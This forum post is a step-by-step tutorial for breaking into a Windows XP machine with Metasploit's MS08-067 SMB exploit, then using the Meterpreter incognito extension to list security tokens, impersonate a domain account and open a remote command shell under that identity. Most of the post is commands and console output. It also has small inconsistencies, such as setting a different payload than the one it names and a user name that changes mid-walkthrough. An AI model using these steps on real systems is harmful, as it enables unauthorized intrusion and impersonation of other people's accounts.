Forum Thread: Impersonation of Users Using Metasploit -{Old but Effective}

Now we will see how to impersonate a system user without having to create a new user with administrator permissions.
First let's suppose that we have entered the PC with an exploit like :

  • exploit / windows / smb / ms08067netapi

and with a PAYLOAD like :

  • windows / vncinject / bind_tcp

In this case we will use the PAYLOAD windows / shell / bind_tcp . I will not explain much because many knows it .
msf console

| | | | (_) |
_ _ _| | _ _ _ | | _ | |
| ' ` \ / \ _/ ` / _| ' \| |/ \| | _|
| | | | | | _/ || (| \_ \ |) | | () | | |
|| || ||\_|\_\_,|_/ ._/||\_/|_|\_|
| |
|_|

= metasploit v3.3.2-release [core:3.3 api:1.0

  • -- --= 462 exploits - 219 auxiliary
  • -- --= 192 payloads - 22 encoders - 8 nops

= svn r7808 updated 16 days ago (2009.12.10)

Warning: This copy of the Metasploit Framework was last updated 16 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://dev.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use exploit/windows/smb/ms08067netapi
msf exploit(ms08067netapi) > set RHOST 192.168.0.3
RHOST => 192.168.0.3
msf exploit(ms08067netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08067netapi) > exploit

* Started bind handler
* Automatically detecting the target...
* Fingerprint: Windows XP Service Pack 2 - lang:Spanish
* Selected Target: Windows XP SP2 Spanish (NX)
* Triggering the vulnerability...
* Sending stage (723456 bytes)
* Meterpreter session 1 opened (192.168.0.2:4661 -> 192.168.0.3:4444)

meterpreter >

  • After obtaining the Meterpreter , we will execute the use plus the incognito option

meterpreter > use incognito
Loading extension incognito...success.
meterpreter >

  • We look at what options you have:
  • code
  • meterpreter > help

Incognito Commands
==================

Command Description
------- -----------
addgroupuser Attempt to add a user to a global group with all tokens
addlocalgroupuser Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token

meterpreter >

  • We will use the list_tokens command . But let's see what parameters you have for execution:

code

  • meterpreter > list_tokens

Usage: listtokens <listorder_option>

Lists all accessible tokens and their privilege level

OPTIONS:

-g List tokens by unique groupname
-u List tokens by unique username

meterpreter >

  • Now we will show the existing users in the System:
  • Code:

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
COLTEJER\ServerColtejer
NT AUTHORITY\Servicio de red
NT AUTHORITY\SERVICIO LOCAL
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter >

  • Now comes the moment when we are going to supplant a user.
  • Code

meterpreter > impersonate_token COLTEJER\\ServerColtejer

  • Delegation token available
  • Successfully impersonated user COLTEJER\ServerColtejer

meterpreter >

  • Open the console or remote shell of the deprecated user. In this case the user ayman\ Serverayman

Code:
meterpreter > execute -f cmd.exe -i -t
Process 1528 created.
Channel 1 created.
Microsoft Windows XP Versi¢n 5.1.2600
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active